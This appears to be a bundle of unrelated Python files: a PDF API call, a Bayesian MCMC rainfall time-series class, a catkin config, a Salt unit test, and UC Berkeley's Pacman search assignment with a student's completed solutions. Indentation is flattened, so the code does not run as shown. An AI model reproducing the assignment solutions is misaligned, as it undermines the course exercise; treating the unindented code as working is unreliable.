    # TODO: map values onto all of the class boundaries in ``points``;
    # for now this is only a binary split around the middle threshold.
    def select(a):
        return 1 if a > points[2] else 0
new_target = [select(x) for x in new_target]
return new_target
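# Illustrative round trip using the functions above:
#   signal_to_class([1, -1], n=2)              -> [[1.0, 0.0], [0.0, 1.0]]
#   class_to_signal([[1.0, 0.0], [0.0, 1.0]])  -> array([ 1., -1.])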
|
from configuration import *
file_name = 'PdfWithAnnotations.pdf'
uploadFile(file_name)
response = pdf_api.get_document_file_attachment_annotations(
file_name, folder=temp_folder)
pprint(response)
|
# searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError(fn + ' is not a search function in search.py.')
func = getattr(search, fn)
if 'heuristic' not in func.__code__.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception("No search function provided for SearchAgent")
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActions(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, successor
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print('Warning: this does not look like a regular search maze')
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
cost = self.costFn(nextState)
successors.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
            # Figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
class StayEastSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the West side of the board.
The cost function for stepping into a position (x,y) is 1/2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: .5 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the East side of the board.
The cost function for stepping into a position (x,y) is 2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: 2 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class CornersProblem(search.SearchProblem):
"""
This search problem finds paths through all four corners of a layout.
You must select a suitable state space and successor function
"""
def __init__(self, startingGameState):
"""
Stores the walls, pacman's starting position and corners.
"""
self.walls = startingGameState.getWalls()
self.startingPosition = startingGameState.getPacmanPosition()
top, right = self.walls.height-2, self.walls.width-2
self.corners = ((1,1), (1,top), (right, 1), (right, top))
for corner in self.corners:
if not startingGameState.hasFood(*corner):
print('Warning: no food in corner ' + str(corner))
self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
# Please add any code here which you would like to use
# in initializing the problem
"*** YOUR CODE HERE ***"
# print(self.startingPosition)
self.startingGameState= startingGameState
self.startState = (self.startingPosition, [])
def getStartState(self):
"""
Returns the start state (in your state space, not the full Pacman state
space)
"""
"*** YOUR CODE HERE ***"
return self.startState
def isGoalState(self, state):
"""
Returns whether this search state is a goal state of the problem.
"""
"*** YOUR CODE HERE ***"
if state[0] in self.corners:
if len(state[1])== len(self.corners):
return True
return False
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost'
is the incremental cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
# Add a successor state to the successor list if the action is legal
# Here's a code snippet for figuring out whether a new position hits a wall:
# x,y = currentPosition
# dx, dy = Actions.directionToVector(action)
# nextx, nexty = int(x + dx), int(y + dy)
# hitsWall = self.walls[nextx][nexty]
"*** YOUR CODE HERE ***"
# Copied from the getSuccessors function of PositionSearchProblem class
x,y=state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
next = (nextx, nexty)
if next in self.corners:
if next not in state[1]:
successors.append(((next, state[1]+[next]), action, 1))
successors.append(((next,state[1]), action, 1))
self._expanded += 1 # DO NOT CHANGE
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999. This is implemented for you.
"""
if actions == None: return 999999
x,y= self.startingPosition
for action in actions:
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
return len(actions)
def cornersHeuristic(state, problem):
"""
A heuristic for the CornersProblem that you defined.
state: The current search state
(a data structure you chose in your search problem)
problem: The CornersProblem instance for this layout.
This function should always return a number that is a lower bound on the
shortest path from the state to a goal of the problem; i.e. it should be
admissible (as well as consistent).
"""
corners = problem.corners # These are the corner coordinates
walls = problem.walls # These are the walls of the maze, as a Grid (game.py)
# print(corners)
# print(walls)
# print(state)
"*** YOUR CODE HERE ***"
    # This heuristic relies on the triangle inequality: the distance to the farthest
    # unvisited corner is at most the distance to another corner plus the distance
    # between those corners, i.e. h(s) <= c(s, n) + h(n), which keeps it consistent.
current, closed = state
open =set(corners)-set(closed)
open = list(open)
size =[]
if not open:
return 0
if len(open) == 1:
return mazeDistance(current, open[0], problem.startingGameState)
for corner in open:
size.append(mazeDistance(current, corner, problem.startingGameState))
index1=size.index(max(size))
start1 = open[index1]
distance_goal1=max(size)
open.pop(index1)
size.clear()
for corner in open:
size.append(mazeDistance(start1, corner, problem.startingGameState))
index2=size.index(max(size))
distance_goal2=mazeDistance(current,open[index2],problem.startingGameState)
distance_goal3=max(size)
if distance_goal1>distance_goal2:
return distance_goal3+distance_goal2
return distance_goal3+distance_goal1
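# Illustrative alternative (not part of the original assignment solution): an
# admissible heuristic for the CornersProblem that ignores walls entirely. It
# returns the exact cost of that relaxation, i.e. the shortest Manhattan-distance
# tour through the unvisited corners, found by brute force over the at most 4!
# orderings. Every real path is at least as long as its wall-free relaxation,
# so this never overestimates. The function name is ours, not part of the project.
def cornersRelaxedHeuristic(state, problem):
    "Exact wall-free lower bound for the CornersProblem (sketch)."
    from itertools import permutations
    position, visited = state
    remaining = [corner for corner in problem.corners if corner not in visited]
    if not remaining:
        return 0
    best = None
    for ordering in permutations(remaining):
        current, cost = position, 0
        for corner in ordering:
            cost += abs(current[0] - corner[0]) + abs(current[1] - corner[1])
            current = corner
        if best is None or cost < best:
            best = cost
    return best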
class AStarCornersAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
self.searchType = CornersProblem
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def getSuccessors(self, state):
"Returns successor states, the actions they require, and a cost of 1."
successors = []
self._expanded += 1 # DO NOT CHANGE
for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state[0]
dx, dy = Actions.directionToVector(direction)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
return successors
def getCostOfActions(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
"""
Your heuristic for the FoodSearchProblem goes here.
This heuristic must be consistent to ensure correctness. First, try to come
up with an admissible heuristic; almost all admissible heuristics will be
consistent as well.
    If using A* ever finds a solution that is worse than what uniform cost search
    finds, your heuristic is *not* consistent, and probably not admissible! On the
your heuristic is *not* consistent, and probably not admissible! On the
other hand, inadmissible or inconsistent heuristics may find optimal
solutions, so be careful.
The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
(see game.py) of either True or False. You can call foodGrid.asList() to get
a list of food coordinates instead.
If you want access to info like walls, capsules, etc., you can query the
problem. For example, problem.walls gives you a Grid of where the walls
are.
If you want to *store* information to be reused in other calls to the
heuristic, there is a dictionary called problem.heuristicInfo that you can
use. For example, if you only want to count the walls once and store that
value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
Subsequent calls to this heuristic can access
problem.heuristicInfo['wallCount']
"""
position, foodGrid = state
"*** YOUR CODE HERE ***"
    # Adapted from the cornersHeuristic function above
open = foodGrid.asList()
size =[]
if not open:
return 0
if len(open) == 1:
return mazeDistance(position, open[0], problem.startingGameState)
for corner in open:
size.append(mazeDistance(position, corner, problem.startingGameState))
index1=size.index(max(size))
start1 = open[index1]
distance_goal1=mazeDistance(position,start1,problem.startingGameState)
open.pop(index1)
size.clear()
for corner in open:
size.append(mazeDistance(start1, corner, problem.startingGameState))
index2=size.index(max(size))
distance_goal2=mazeDistance(position,open[index2],problem.startingGameState)
distance_goal3=mazeDistance(start1,open[index2],problem.startingGameState)
if distance_goal1>distance_goal2:
return distance_goal3+distance_goal2
return distance_goal3+distance_goal1
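# Illustrative helper (not part of the original file): the docstring above
# suggests problem.heuristicInfo for caching. This sketch memoises maze
# distances between point pairs so repeated heuristic calls do not rerun BFS
# for the same pair. It assumes mazeDistance (defined later in this file) and
# problem.startingGameState, both of which foodHeuristic already uses.
def cachedMazeDistance(point1, point2, problem):
    "Maze distance memoised in problem.heuristicInfo (sketch)."
    cache = problem.heuristicInfo.setdefault('mazeDistances', {})
    key = (point1, point2) if point1 <= point2 else (point2, point1)
    if key not in cache:
        cache[key] = mazeDistance(point1, point2, problem.startingGameState)
    return cache[key]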
class ClosestDotSearchAgent(SearchAgent):
"Search for all food using a sequence of searches"
def registerInitialState(self, state):
self.actions = []
currentState = state
while(currentState.getFood().count() > 0):
nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
self.actions += nextPathSegment
for action in nextPathSegment:
legal = currentState.getLegalActions()
if action not in legal:
t = (str(action), str(currentState))
raise Exception('findPathToClosestDot returned an illegal move: %s!\n%s' % t)
currentState = currentState.generateSuccessor(0, action)
self.actionIndex = 0
print('Path found with cost %d.' % len(self.actions))
def findPathToClosestDot(self, gameState):
"""
Returns a path (a list of actions) to the closest dot, starting from
gameState.
"""
# Here are some useful elements of the startState
startPosition = gameState.getPacmanPosition()
food = gameState.getFood()
walls = gameState.getWalls()
problem = AnyFoodSearchProblem(gameState)
"*** YOUR CODE HERE ***"
        # Any of the search functions other than DFS finds the closest dot efficiently;
        # uniform cost search is used here.
return search.ucs(problem)
class AnyFoodSearchProblem(PositionSearchProblem):
"""
A search problem for finding a path to any food.
This search problem is just like the PositionSearchProblem, but has a
different goal test, which you need to fill in below. The state space and
successor function do not need to be changed.
The class definition above, AnyFoodSearchProblem(PositionSearchProblem),
inherits the methods of the PositionSearchProblem.
You can use this search problem to help you fill in the findPathToClosestDot
method.
"""
def __init__(self, gameState):
"Stores information from the gameState. You don't need to change this."
# Store the food for later reference
self.food = gameState.getFood()
# Store info for the PositionSearchProblem (no need to change this)
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
self.costFn = lambda x: 1
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def isGoalState(self, state):
"""
The state is Pacman's position. Fill this in with a goal test that will
complete the problem definition.
"""
x,y = state
"*** YOUR CODE HERE ***"
if (x,y) in self.food.asList():
return True
return False
def mazeDistance(point1, point2, gameState):
"""
Returns the maze distance between any two points, using the search functions
you have already built. The gameState can be any game state -- Pacman's
position in that state is ignored.
Example usage: mazeDistance( (2,4), (5,6), gameState)
This might be a useful helper function for your ApproximateSearchAgent.
"""
x1, y1 = point1
x2, y2 = point2
walls = gameState.getWalls()
assert not walls[x1][y1], 'point1 is a wall: ' + str(point1)
assert not walls[x2][y2], 'point2 is a wall: ' + str(point2)
prob = PositionSearchProblem(gameState, start=point1, goal=point2, warn=False, visualize=False)
return len(search.bfs(prob))
|
from os import path
import matplotlib.pyplot as plt
import numpy as np
from compound_poisson import mcmc
from compound_poisson import time_series
from compound_poisson.mcmc import target_time_series
class TimeSeriesMcmc(time_series.TimeSeries):
"""Fit Compound Poisson time series using Rwmh from a Bayesian setting
Method uses Metropolis Hastings within Gibbs. Sample either the z or the
regression parameters. Uniform prior on z, Normal prior on the
regression parameters. Adaptive MCMC from Roberts and Rosenthal (2009)
For more attributes, see the superclass
Attributes:
n_sample: number of MCMC samples
parameter_target: wrapper Target object to evaluate the posterior of
the parameters
parameter_mcmc: Mcmc object which does MCMC using parameter_target
z_target: wrapper Target object to evaluate the posterior of z
z_mcmc: Mcmc object which does MCMC using z_target
gibbs_weight: up to a constant, probability of sampling each mcmc in
self.get_mcmc_array()
burn_in: integer, which samples to discard when doing posterior
sampling which is used for forecasting
memmap_dir: directory to store the MCMC samples
set_from_mcmc: boolean, True if to automatically randomly set from
MCMC samples
"""
def __init__(self,
x,
rainfall=None,
poisson_rate_n_arma=None,
gamma_mean_n_arma=None,
cp_parameter_array=None):
super().__init__(x,
rainfall,
poisson_rate_n_arma,
gamma_mean_n_arma,
cp_parameter_array)
self.n_sample = 50000
self.parameter_target = target_time_series.TargetParameter(self)
self.parameter_mcmc = None
self.z_target = target_time_series.TargetZ(self)
self.z_mcmc = None
self.gibbs_weight = [0.003*len(self), 1]
self.burn_in = 0
self.memmap_dir = ""
self.set_from_mcmc = True
def fit(self):
"""Fit using Gibbs sampling
Override - Gibbs sample either z, regression parameters or the
precision.
"""
self.initalise_z()
self.instantiate_mcmc()
mcmc_array = self.get_mcmc_array()
mcmc.do_gibbs_sampling(
mcmc_array, self.n_sample, self.rng, self.gibbs_weight)
def resume_fitting(self, n_sample):
"""Run more MCMC samples
Args:
n_sample: new number of mcmc samples
"""
if n_sample > self.n_sample:
mcmc_array = self.get_mcmc_array()
for mcmc_i in mcmc_array:
mcmc_i.extend_memmap(n_sample)
# in resume, do not use initial value as sample (False in arg 3)
mcmc.do_gibbs_sampling(
mcmc_array, n_sample - self.n_sample, self.rng,
self.gibbs_weight, False)
self.n_sample = n_sample
self.delete_old_memmap()
def initalise_z(self):
"""Initalise all z in self.z_array and update all parameters
Initalise all z in self.z_array using e_step() and update all
parameters using update_all_cp_parameters(). Required for e.g.
likelihood evaluation because z=0 if and only if y=0.
"""
self.e_step() # initalise the z using the E step
self.z_array = self.z_array.round() # round it to get integer
# z cannot be 0 if y is not 0
self.z_array[np.logical_and(self.z_array == 0, self.y_array > 0)] = 1
        self.update_all_cp_parameters() # initialise the cp parameters
def instantiate_mcmc(self):
"""Instantiate all MCMC objects
Instantiate all MCMC objects by passing the corresponding Target
objects and random number generators
"""
self.parameter_mcmc = mcmc.Rwmh(
self.parameter_target, self.rng, self.n_sample, self.memmap_dir)
self.z_mcmc = mcmc.ZRwmh(
self.z_target, self.rng, self.n_sample, self.memmap_dir)
def get_mcmc_array(self):
"""Return array of Mcmc objects
Each element in this array can be called to do a Gibbs step for
different components
"""
mcmc_array = [
self.z_mcmc,
self.parameter_mcmc,
]
return mcmc_array
def set_burn_in(self, burn_in):
self.burn_in = burn_in
def set_parameter_from_sample(self, rng):
"""Set parameter from MCMC sample
Set the regression parameters and latent variables z from the MCMC
samples in parameter_sample and z_sample.
"""
index = rng.randint(self.burn_in, len(self.parameter_mcmc))
self.set_parameter_from_sample_i(index)
self.update_all_cp_parameters()
def set_parameter_from_sample_i(self, index):
"""Set parameter for a specified MCMC sample
"""
self.set_parameter_vector(self.parameter_mcmc[index])
self.z_array = self.z_mcmc[index]
# override
def forecast_self(self, n_simulation):
self.read_memmap()
super().forecast_self(n_simulation)
self.del_memmap()
def instantiate_forecast_self(self):
"""Override - Set the parameter from the MCMC sample
"""
if self.set_from_mcmc:
self.set_parameter_from_sample(self.self_forecaster_rng)
forecast = super().instantiate_forecast_self()
return forecast
# override
def forecast(self, x, n_simulation):
self.read_memmap()
super().forecast(x, n_simulation)
self.del_memmap()
# override
def instantiate_forecast(self, x):
"""Override - Set the parameter from the MCMC sample
"""
if self.set_from_mcmc:
self.set_parameter_from_sample(self.forecaster_rng)
forecast = super().instantiate_forecast(x)
return forecast
def simulate_from_prior(self):
"""Simulate using a parameter from the prior
MODIFIES ITSELF
        Replaces the parameter with a sample from the prior. The prior mean and
        prior covariance are left unmodified.
"""
# keep sampling until the sampled parameter does not have numerical
# problems
while True:
try:
# sample from the prior and set it
prior_parameter = self.simulate_parameter_from_prior()
self.set_parameter_vector(prior_parameter)
self.simulate()
                # accept the sample only if none of the parameters are nan
if np.any(np.isnan(self.poisson_rate.value_array)):
pass
elif np.any(np.isnan(self.gamma_mean.value_array)):
pass
elif np.any(np.isnan(self.gamma_dispersion.value_array)):
pass
else:
break
# try again if there are numerical problems
except(ValueError, OverflowError):
pass
def simulate_parameter_from_prior(self):
"""Simulate parameter from the prior
Return a sample from the prior
"""
return self.parameter_target.simulate_from_prior(self.rng)
def read_memmap(self):
"""Read all memmap file handling from all MCMCs
"""
for mcmc_i in self.get_mcmc_array():
mcmc_i.read_memmap()
def read_to_write_memmap(self):
for mcmc_i in self.get_mcmc_array():
mcmc_i.read_to_write_memmap()
def del_memmap(self):
for mcmc_i in self.get_mcmc_array():
mcmc_i.del_memmap()
def delete_old_memmap(self):
for mcmc_i in self.get_mcmc_array():
mcmc_i.delete_old_memmap()
def print_mcmc(self, directory, true_parameter=None):
parameter_name = self.get_parameter_vector_name()
self.read_memmap()
chain = np.asarray(self.parameter_mcmc[:])
for i in range(self.n_parameter):
chain_i = chain[:, i]
plt.figure()
plt.plot(chain_i)
if true_parameter is not None:
plt.hlines(true_parameter[i], 0, len(chain)-1)
plt.ylabel(parameter_name[i])
plt.xlabel("Sample number")
plt.savefig(
path.join(directory, "chain_parameter_" + str(i) + ".pdf"))
plt.close()
chain = []
z_chain = np.asarray(self.z_mcmc[:])
chain = np.mean(z_chain, 1)
plt.figure()
plt.plot(chain)
plt.ylabel("Mean of latent variables")
plt.xlabel("Sample number")
plt.savefig(path.join(directory, "chain_z.pdf"))
plt.close()
self.print_chain_property(directory)
self.del_memmap()
def print_chain_property(self, directory):
plt.figure()
plt.plot(np.asarray(self.parameter_mcmc.accept_array))
plt.ylabel("Acceptance rate of parameters")
plt.xlabel("Parameter sample number")
plt.savefig(path.join(directory, "accept_parameter.pdf"))
plt.close()
plt.figure()
plt.plot(np.asarray(self.z_mcmc.accept_array))
plt.ylabel("Acceptance self of latent variables")
plt.xlabel("Latent variable sample number")
plt.savefig(path.join(directory, "accept_z.pdf"))
plt.close()
class TimeSeriesSlice(TimeSeriesMcmc):
"""Fit Compound Poisson time series using slice sampling from a Bayesian
setting
Method uses slice within Gibbs. Sample either the z or the
regression parameters. Uniform prior on z, Normal prior on the
regression parameters. Sample z using slice sampling (Neal, 2003).
Sampling the parameters using elliptical slice sampling (Murray 2010).
For more attributes, see the superclass
"""
def __init__(self,
x,
rainfall=None,
poisson_rate_n_arma=None,
gamma_mean_n_arma=None,
cp_parameter_array=None):
super().__init__(x,
rainfall,
poisson_rate_n_arma,
gamma_mean_n_arma,
cp_parameter_array)
self.n_sample = 10000
def instantiate_mcmc(self):
"""Instantiate all MCMC objects
Override
Instantiate slice sampling for the parameter and z
"""
self.parameter_mcmc = mcmc.Elliptical(
self.parameter_target, self.rng, self.n_sample, self.memmap_dir)
self.z_mcmc = mcmc.ZSlice(
self.z_target, self.rng, self.n_sample, self.memmap_dir)
def print_chain_property(self, directory):
plt.figure()
plt.plot(np.asarray(self.parameter_mcmc.n_reject_array))
plt.ylabel("Number of rejects in parameter slicing")
plt.xlabel("Parameter sample number")
plt.savefig(path.join(directory, "n_reject_parameter.pdf"))
plt.close()
plt.figure()
plt.plot(np.asarray(self.z_mcmc.slice_width_array))
plt.ylabel("Latent variable slice width")
plt.xlabel("Latent variable sample number")
plt.savefig(path.join(directory, "slice_width_z.pdf"))
plt.close()
class TimeSeriesHyperSlice(TimeSeriesSlice):
"""Fit Compound Poisson time series using slice sampling with a prior on
the precision
Method uses slice within Gibbs. Uniform prior on z, Normal prior on the
regression parameters, Gamma prior on the precision of the covariance
of the Normal prior. Gibbs sample either z, regression parameters or
the precision. Sample z using slice sampling (Neal, 2003). Sampling the
parameters using elliptical slice sampling (Murray 2010).
For more attributes, see the superclass
Attributes:
        precision_target: wrapper Target object which evaluates the posterior
            of the precision
precision_mcmc: Mcmc object for precision_target
"""
def __init__(self,
x,
rainfall=None,
poisson_rate_n_arma=None,
gamma_mean_n_arma=None,
cp_parameter_array=None):
super().__init__(x,
rainfall,
poisson_rate_n_arma,
gamma_mean_n_arma,
cp_parameter_array)
self.precision_target = target_time_series.TargetPrecision(self)
# mcmc object evaluated at instantiate_mcmc
self.precision_mcmc = None
self.gibbs_weight = [0.003*len(self), 1, 0.2]
def instantiate_mcmc(self):
"""Instantiate all MCMC objects
Override - instantiate the MCMC for the precision
"""
super().instantiate_mcmc()
self.precision_target.prograte_precision()
self.precision_mcmc = mcmc.Rwmh(
self.precision_target, self.rng, self.n_sample, self.memmap_dir)
def get_mcmc_array(self):
mcmc_array = super().get_mcmc_array()
mcmc_array.append(self.precision_mcmc)
return mcmc_array
def simulate_parameter_from_prior(self):
"""Simulate parameter from the prior
Override - Sample the precision from the prior and then sample the
parameter from the prior
"""
self.precision_target.set_from_prior(self.rng)
self.precision_target.prograte_precision()
return super().simulate_parameter_from_prior()
def print_chain_property(self, directory):
super().print_chain_property(directory)
precision_chain = np.asarray(self.precision_mcmc[:])
for i in range(2):
chain_i = precision_chain[:, i]
plt.figure()
plt.plot(chain_i)
plt.ylabel("precision" + str(i))
plt.xlabel("Sample number")
plt.savefig(
path.join(directory, "chain_precision_" + str(i) + ".pdf"))
plt.close()
plt.figure()
plt.plot(np.asarray(self.precision_mcmc.accept_array))
plt.ylabel("Acceptance rate of parameters")
plt.xlabel("Parameter sample number")
plt.savefig(path.join(directory, "accept_precision.pdf"))
plt.close()
def static_initalise_z(time_series):
"""Static version of initalise_z(). Used for parallel programming.
"""
time_series.initalise_z()
return time_series
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs;sensor_msgs;geometry_msgs;nav_msgs;tf;turtlebot3_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot3_fake"
PROJECT_SPACE_DIR = "/root/catkin_ws/install"
PROJECT_VERSION = "1.3.0"
|
import os
import pytest
import salt.utils.verify
from tests.support.mock import patch
@pytest.mark.skip_on_windows(reason="Not applicable for Windows.")
@patch("os.chown")
@patch("os.stat")
def test_verify_env_race_condition(mock_stat, mock_chown):
def _stat(path):
"""
Helper function for mock_stat, we want to raise errors for specific paths, but not until we get into the proper path.
Until then, just return plain os.stat_result
"""
if path in ("/tmp/salt-dir/.file3", "/tmp/salt-dir/.dir3"):
raise AssertionError("The .file3 and .dir3 paths should never be called!")
if path in ("/tmp/salt-dir/file1", "/tmp/salt-dir/dir1"):
raise FileNotFoundError(
"[Errno 2] No such file or directory: this exception should not be visible"
)
# we need to return at least different st_uid in order to trigger chown for these paths
if path in ("/tmp/salt-dir/file4", "/tmp/salt-dir/dir4"):
return os.stat_result([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])
return os.stat_result([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
def _chown(path, uid, gid):
if path in ("/tmp/salt-dir/file4", "/tmp/salt-dir/dir4"):
raise FileNotFoundError(
"[Errno 2] No such file or directory: this exception should not be visible"
)
return
mock_stat.side_effect = _stat
mock_chown.side_effect = _chown
